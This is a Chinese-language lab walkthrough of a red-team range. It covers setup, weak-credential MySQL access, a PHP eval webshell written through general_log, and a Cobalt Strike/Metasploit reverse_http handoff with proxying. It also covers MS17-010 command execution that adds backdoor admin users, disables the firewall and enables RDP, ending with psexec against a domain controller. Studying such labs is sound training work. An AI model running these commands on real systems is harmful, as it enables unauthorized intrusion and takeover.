ATT&CK红队评估(红日靶场一)
字数 1560 2025-08-11 23:26:41
ATT&CK红队评估(红日靶场一)渗透测试教学文档
靶场环境搭建
-
网络配置:
- 新建仅主机模式网络,子网地址设置为192.168.52.0
- 将Windows 2003和Windows 2008两台主机设置为自定义VMnet16
- Win7配置:
- 内网IP: 192.168.52.143
- 开启phpstudy服务
- 目标主机IP:
- Win2003: 192.168.52.141
- Win2008: 192.168.52.138
-
攻击机配置:
- Kali Linux作为攻击主机
- Kali和Win7的第二个网卡可以在同一自定义仅主机模式网段或NAT下
初始渗透阶段
1. 信息收集
nmap -sS -sV -Pn 192.168.48.144
- 发现开放端口:
- 80端口:HTTP网站
- 3306端口:MySQL数据库
2. Web应用渗透
- 访问网站发现phpstudy探针
- MySQL弱口令检测:
- 用户名/密码:root/root
- 访问phpMyAdmin后台:
- 使用root/root成功登录
3. 获取WebShell
-
检查数据库导入权限:
SHOW GLOBAL VARIABLES LIKE '%secure%'- 无导入权限
-
检查日志记录功能:
SHOW GLOBAL VARIABLES LIKE '%general%'- 日志记录功能关闭
-
开启日志记录并写入WebShell:
SET GLOBAL general_log = ON SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php' select '<?php eval ($_POST[hack]);?>' -
使用蚁剑连接WebShell:
- 发现目录中存在另一个网站yxcms
4. 获取CS会话
- 使用CS生成木马并通过蚁剑上传执行
- 执行后成功上线CS
- 优化回显:
sleep 0
权限提升
-
信息收集:
whoami systeminfo- 当前权限:administrator
- 系统补丁:仅安装4个
-
使用ms14_058漏洞提权:
- 提权成功
内网渗透
1. 内网信息收集
- 发现内网网段:192.168.52.0/24
- 发现存在域环境
- 抓取明文密码
2. 与MSF联动
-
MSF监听设置:
use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost <本机IP> set lport <监听端口> exploit -
CS设置Foreign监听:
- 创建Listener,IP为MSF的IP,端口为MSF监听的端口
- 在会话上右键选择"新建会话",选择创建的Foreign监听器
-
MSF建立反向代理:
run post/multi/manage/autoroute run autoroute -p background use auxiliary/server/socks_proxy set VERSION 4a set SRVHOST 127.0.0.1 exploit -
配置proxychains:
vim /etc/proxychains4.conf
3. 内网主机发现
-
ARP探测存活主机:
use post/windows/gather/arp_scanner set RHOSTS 192.168.52.0/24 set SESSION 1 exploit -
UDP协议探测:
use auxiliary/scanner/discovery/udp_sweep set RHOSTS 192.168.52.0/24 exploit -
发现三台存活主机
-
查看域信息:
net view net view /domain
4. 横向渗透
-
端口扫描:
proxychains nmap -sS -sV -Pn 192.168.52.141 proxychains nmap -sS -sV -Pn 192.168.52.138 -
针对192.168.52.141(Win2003)的攻击:
-
发现开放445端口
-
尝试MS17_010(永恒之蓝)攻击:
use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.141 exploit- 存在漏洞但获取shell失败
-
使用命令执行模块:
use auxiliary/admin/smb/ms17_010_command set COMMAND net user set RHOST 192.168.52.141 exploit -
添加用户:
set COMMAND net user hack qaz@123 /add set COMMAND net localgroup administrators hack /add -
尝试开启3389失败,转而使用Telnet:
set COMMAND sc config tlntsvr start= auto set COMMAND net start telnet set COMMAND netstat -an -
Telnet登录:
use auxiliary/scanner/telnet/telnet_login set RHOSTS 192.168.52.141 set username hack set PASSWORD qaz@123 exploit- 成功控制192.168.52.141
-
-
针对192.168.52.138(Win2008域控)的攻击:
-
80端口:IIS初始页面,无敏感目录
-
445端口攻击:
use auxiliary/admin/smb/ms17_010_command set COMMAND net user hack qaz@123 /add set COMMAND net localgroup administrators hack /add -
尝试开启Telnet失败(Win2008默认未安装)
-
关闭防火墙:
set COMMAND netsh advfirewall set allprofiles state off -
开启3389:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f net start termservice- 开启成功但连接失败
-
使用CS的SMB Beacon:
- 新建监听器,Payload选择Beacon SMB
- 使用psexec模块横向移动:
- 右键目标 → 横向移动 → psexec
- 成功拿下域控主机
-
关键知识点总结
-
Web渗透:
- phpstudy探针信息泄露
- MySQL弱口令利用
- 通过日志记录功能获取WebShell
-
权限提升:
- 利用ms14_058漏洞提权
- 系统补丁信息收集
-
内网渗透:
- MSF与CS联动技术
- 内网主机发现技术(ARP/UDP扫描)
- 横向移动方法:
- MS17_010漏洞利用
- Telnet服务控制
- SMB Beacon技术
-
域控攻击:
- 通过已控主机凭证进行横向移动
- psexec在域环境中的利用
-
规避检测:
- 使用反向代理隐藏攻击流量
- 多种方法绕过防火墙限制
注意事项
- 密码策略限制可能导致简单密码添加失败
- 不同Windows版本对服务的支持不同(如Win2008默认无Telnet)
- 32位/64位系统对漏洞利用模块的兼容性
- 多种方法尝试的重要性(当一种方法失败时及时切换)